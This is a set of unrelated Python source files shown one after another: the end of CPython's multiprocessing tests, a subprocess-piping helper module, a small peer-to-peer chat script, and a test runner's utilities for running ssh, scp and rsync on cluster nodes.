self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
subproc.py | #! env python
# should work with Python 2.7 and 3.x
# subproc.py
from __future__ import print_function
import logging
import os
import shlex
import signal
import subprocess
import sys
import threading
from collections import namedtuple
from multiprocessing import TimeoutError
try:
from itertools import izip
except ImportError:
izip = zip
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
logger = logging.getLogger(os.path.basename(__file__.replace('.py', '')))
RunResult = namedtuple('RunResult', ['pid', 'return_code', 'stdout', 'stderr'])
RunRedirectedResult = namedtuple('RunRedirectedResult', ['pid', 'return_code'])
Info = namedtuple('Info', ['cmd', 'pid', 'return_code'])
RunCmdsResult = namedtuple('RunCmdsResult', ['infos', 'stdout', 'stderr'])
RunCmdsRedirectedResult = namedtuple('RunCmdsRedirectedResult', ['info'])
DEVNULL = None
def run(cmd, timeoutsec=None, formatter=None):
"""\
Executes the given command and captures its stdout and stderr output.
By default, the resulting process and all its child processes are grouped together in a process group.
In case of a timeout, the process and its child processes are terminated.
:param cmd: the command to execute
:param timeoutsec: interrupts the process after the timeout (in seconds)
:param formatter: function accepting and returning the line to print
:return: :py:class:`RunResult`
Example::
r = run('echo hello world', formatter=str.upper)
assert r.stdout == 'HELLO WORLD'
"""
out = StringIO()
err = StringIO()
result = run_redirected(cmd, out=out, err=err, timeoutsec=timeoutsec, formatter=formatter)
return RunResult(result.pid, result.return_code, out.getvalue(), err.getvalue())
def run_redirected(cmd, out=sys.stdout, err=sys.stderr, timeoutsec=None, formatter=None):
"""\
Executes the given command and redirects its output if applicable.
By default, the resulting process and all its child processes are grouped together in a process group.
In case of a timeout, the process and its child processes are terminated.
:param cmd: the command to execute
:param out: file-like object to write the stdout to (default sys.stdout, None -> os.devnull)
:param err: file-like object to write the stderr to (default sys.stderr, None -> os.devnull)
:param timeoutsec: interrupts the process after the timeout (in seconds)
:param formatter: function accepting and returning the line to print
:return: :py:class:`RunRedirectedResult`
Example::
with open('proc.log', 'w') as f:
r = run_to_file('echo hello world', out=f, formatter=str.upper)
assert r.return_code == 0
"""
p = pipe_processes([cmd], total=1, out=out, err=err)[0]
consume_pipes([p], out, err, timeoutsec, formatter)
# pull return code
p.wait()
return RunRedirectedResult(p.pid, p.returncode)
def run_cmds(cmds, timeoutsec=None, formatter=None):
"""\
Executes the given commands by piping them together.
Stdout as well as stderr are captured.
By default, the resulting processes and all its child processes are grouped together in a process group.
In case of a timeout, the processes and its child processes are terminated.
:param cmds: the commands to execute
:param timeoutsec: interrupts the processes after the timeout (in seconds)
:param formatter: function accepting and returning the line to print
:return: :py:class:`RunCmdsRedirected`
Example::
with open('proc.log', 'w') as f:
r = run_cmds_redirected(['echo hello world', 'sed s/hello/bye/g'], out=f, formatter=str.upper)
assert r.return_code == 0
"""
out = StringIO()
err = StringIO()
results = run_cmds_redirected(cmds, out=out, err=err, timeoutsec=timeoutsec, formatter=formatter)
return RunCmdsResult([r.info for r in results], out.getvalue(), err.getvalue())
def run_cmds_redirected(cmds, out=sys.stdout, err=sys.stderr, timeoutsec=None, formatter=None):
"""\
Executes the given commands by piping them together.
Output is redirected if applicable.
By default, the resulting processes and all its child processes are grouped together in a process group.
In case of a timeout, the processes and its child processes are terminated.
:param cmds: the commands to execute
:param out: file-like object to write the stdout to (default sys.stdout, None -> os.devnull)
:param err: file-like object to write the stderr to (default sys.stderr, None -> os.devnull)
:param timeoutsec: interrupts the processes after the timeout (in seconds)
:param formatter: function accepting and returning the line to print
:return: :py:class:`RunCmdsRedirected`
Example::
with open('proc.log', 'w') as f:
r = run_cmds_redirected(['echo hello world', 'sed s/hello/bye/g'], out=f, formatter=str.upper)
assert r.return_code == 0
"""
if not cmds:
return ValueError('No commands defined')
processes = pipe_processes(cmds, len(cmds), out, err)
consume_pipes(processes, out, err, timeoutsec, formatter)
# pull return code
for cmd, p in izip(cmds, processes):
p.wait()
logger.debug("Command '{}' completed".format(cmd))
return [RunCmdsRedirectedResult(info=Info(cmd, p.pid, p.returncode)) for cmd, p in izip(cmds, processes)]
def consume_pipes(processes, out, err, timeoutsec, formatter):
def write(input, output):
logger.debug('Started pipe consuming thread')
for line in iter(input.readline, ''):
formatted_line = formatter(line) if formatter else line
output.write(formatted_line)
logger.debug('Thread stopped')
p = processes[-1]
threads = []
try:
# start consuming pipes
if out and out != sys.stdout:
t = threading.Thread(target=write, args=(p.stdout, out))
t.daemon = True
threads.append(t)
if err and err != sys.stderr:
t = threading.Thread(target=write, args=(p.stderr, err))
t.daemon = True
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join(timeout=timeoutsec)
if any((t.is_alive() for t in threads)):
raise TimeoutError
except TimeoutError:
logging.warn('Terminating process due to timeout')
for p in processes:
if os.name == 'posix':
os.killpg(p.pid, signal.SIGTERM)
elif os.name == 'nt':
os.kill(p.pid, signal.CTRL_C_EVENT)
finally:
# process might have been killed so wait until threads are shut down otherwise
# -> IOError: close() called during concurrent operation on the same file object
for t in threads:
t.join()
for p in processes:
# close pipe otherwise we might run into a dead lock, e.g.
# when a pipe consuming process stops reading (BrokenPipeError)
close_pipes(p)
def process_params(out, err):
params = {
'universal_newlines': True,
}
# make progress group leader so that signals are directed its children as well
if os.name == 'posix':
params['preexec_fn'] = os.setpgrp
elif os.name == 'nt':
params['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP
# notice that the pipes needs to be consumed
# otherwise this python process will block
# when the pipe reaches its capacity limit (on linux 16 pages = 65,536 bytes)
if out and out != sys.stdout:
params['stdout'] = subprocess.PIPE
elif not out:
try:
params['stdout'] = subprocess.DEVNULL
except AttributeError:
params['stdout'] = open(os.devnull, 'w')
if err and err != sys.stderr:
params['stderr'] = subprocess.PIPE
elif not err:
try:
params['stderr'] = subprocess.DEVNULL
except AttributeError:
params['stderr'] = open(os.devnull, 'w')
return params
def close_pipes(p):
if not p:
return
if p.stdout:
p.stdout.close()
if p.stderr:
p.stderr.close()
def pipe_processes(cmds, total, out, err):
processes = []
try:
cmd = "".join(cmds[-1:])
params = process_params(out, err)
if cmds[:-1]:
processes = list(pipe_processes(cmds[:-1], total, out, err))
intermediate_cmd = total != len(cmds)
if intermediate_cmd:
logger.debug("Redirected command '{}' output to PIPE")
params["stdout"] = subprocess.PIPE
logger.debug("Running cmd {}: {}".format(len(cmds), cmd))
processes.append(subprocess.Popen(shlex.split(cmd), close_fds=True, stdin=processes[-1].stdout, **params))
else:
logger.debug("Running cmd {}: {}".format(len(cmds), cmd))
if total > 1:
logger.debug("Redirected command '{}' output to PIPE")
params["stdout"] = subprocess.PIPE
processes.append(subprocess.Popen(shlex.split(cmd), close_fds=True, **params))
return processes
# catch errors when creating process (e.g. if command was not found)
except OSError as e:
logger.error("Running last cmd failed: {}".format(str(e)))
for p in processes:
close_pipes(p)
raise e
|
wireless_chat.py | """
Send text to other devices running this script remotely.
"""
import multipeer
from console import clear
from time import sleep
from threading import Thread
from PIL import Image
done = False
def loop():
while not done:
data = multipeer.get_data()
if data is not None:
clear()
print(data)
print("> ", end="")
sleep(0.2)
Thread(target=loop).start()
multipeer.connect()
try:
while True:
multipeer.send(input("> "))
except:
done = False
|
utils.py | import glob
import hashlib
import logging
import os
import shutil
import subprocess
from functools import wraps
from tempfile import gettempdir
from threading import Thread
import requests
from timeout_decorator import timeout
from utils.constants import Constant
from utils.format import Format
logger = logging.getLogger('testrunner')
_stepdepth = 0
def step(f):
@wraps(f)
def wrapped(*args, **kwargs):
global _stepdepth
_stepdepth += 1
logger.debug("{} entering {} {}".format(Format.DOT * _stepdepth, f.__name__,
f.__doc__ or ""))
r = f(*args, **kwargs)
logger.debug("{} exiting {}".format(
Format.DOT_EXIT * _stepdepth, f.__name__))
_stepdepth -= 1
return r
return wrapped
class Utils:
def __init__(self, conf):
self.conf = conf
@staticmethod
def chmod_recursive(directory, permissions):
os.chmod(directory, permissions)
for file in glob.glob(os.path.join(directory, "**/*"), recursive=True):
try:
os.chmod(file, permissions)
except Exception as ex:
logger.debug(ex)
@staticmethod
def cleanup_file(file):
if os.path.exists(file):
logger.debug(f"Cleaning up {file}")
try:
try:
# Attempt to remove the file first, because a socket (e.g.
# ssh-agent) is not a file but has to be removed like one.
os.remove(file)
except IsADirectoryError:
shutil.rmtree(file)
except Exception as ex:
logger.debug(ex)
else:
logger.debug(f"Nothing to clean up for {file}")
@staticmethod
def cleanup_files(files):
"""Remove any files or dirs in a list if they exist"""
for file in files:
Utils.cleanup_file(file)
def ssh_cleanup(self):
"""Remove ssh sock files"""
# TODO: also kill ssh agent here? maybe move pkill to kill_ssh_agent()?
sock_file = self.ssh_sock_fn()
sock_dir = os.path.dirname(sock_file)
try:
Utils.cleanup_file(sock_file)
# also remove tempdir if it's empty afterwards
if 0 == len(os.listdir(sock_dir)):
os.rmdir(sock_dir)
else:
logger.warning(f"Dir {sock_dir} not empty; leaving it")
except FileNotFoundError:
pass
except OSError as ex:
logger.debug(ex)
def collect_remote_logs(self, ip_address, logs, store_path):
"""
Collect logs from a remote machine
:param ip_address: (str) IP of the machine to collect the logs from
:param logs: (dict: list) The different logs to collect {"files": [], "dirs": [], ""services": []}
:param store_path: (str) Path to copy the logs to
:return: (bool) True if there was an error while collecting the logs
"""
logging_errors = False
for log in logs.get("files", []):
try:
self.scp_file(ip_address, log, store_path)
except Exception as ex:
logger.debug(
f"Error while collecting {log} from {ip_address}\n {ex}")
logging_errors = True
for log in logs.get("dirs", []):
try:
self.rsync(ip_address, log, store_path)
except Exception as ex:
logger.debug(
f"Error while collecting {log} from {ip_address}\n {ex}")
logging_errors = True
for service in logs.get("services", []):
try:
self.ssh_run(
ip_address, f"sudo journalctl -xeu {service} > {service}.log")
self.scp_file(ip_address, f"{service}.log", store_path)
except Exception as ex:
logger.debug(
f"Error while collecting {service}.log from {ip_address}\n {ex}")
logging_errors = True
return logging_errors
def authorized_keys(self):
public_key_path = self.conf.ssh_key + ".pub"
os.chmod(self.conf.ssh_key, 0o400)
with open(public_key_path) as f:
pubkey = f.read().strip()
return pubkey
def ssh_run(self, ipaddr, cmd):
key_fn = self.conf.ssh_key
cmd = "ssh " + Constant.SSH_OPTS + " -i {key_fn} {username}@{ip} -- '{cmd}'".format(
key_fn=key_fn, ip=ipaddr, cmd=cmd, username=self.conf.nodeuser)
return self.runshellcommand(cmd)
def scp_file(self, ip_address, remote_file_path, local_file_path):
"""
Copies a remote file from the given ip to the give path
:param ip_address: (str) IP address of the node to copy from
:param remote_file_path: (str) Path of the file to be copied
:param local_file_path: (str) Path where to store the log
:return:
"""
cmd = (f"scp {Constant.SSH_OPTS} -i {self.conf.ssh_key}"
f" {self.conf.nodeuser}@{ip_address}:{remote_file_path} {local_file_path}")
self.runshellcommand(cmd)
def rsync(self, ip_address, remote_dir_path, local_dir_path):
"""
Copies a remote dir from the given ip to the give path
:param ip_address: (str) IP address of the node to copy from
:param remote_dir_path: (str) Path of the dir to be copied
:param local_dir_path: (str) Path where to store the dir
:return:
"""
cmd = (f'rsync -avz --no-owner --no-perms -e "ssh {Constant.SSH_OPTS} -i {self.conf.ssh_key}" '
f'--rsync-path="sudo rsync" --ignore-missing-args {self.conf.nodeuser}@{ip_address}:{remote_dir_path} '
f'{local_dir_path}')
self.runshellcommand(cmd)
def runshellcommand(self, cmd, cwd=None, env={}, ignore_errors=False):
"""Running shell command in {workspace} if cwd == None
Eg) cwd is "skuba", cmd will run shell in {workspace}/skuba/
cwd is None, cmd will run in {workspace}
cwd is abs path, cmd will run in cwd
Keyword arguments:
cmd -- command to run
cwd -- dir to run the cmd
env -- environment variables
ignore_errors -- don't raise exception if command fails
"""
if not cwd:
cwd = self.conf.workspace
if not os.path.isabs(cwd):
cwd = os.path.join(self.conf.workspace, cwd)
if not os.path.exists(cwd):
raise FileNotFoundError(Format.alert("Directory {} does not exists".format(cwd)))
if logging.DEBUG >= logger.level:
logger.debug("Executing command\n"
" cwd: {} \n"
" env: {}\n"
" cmd: {}".format(cwd, str(env) if env else "{}", cmd))
else:
logger.info("Executing command {}".format(cmd))
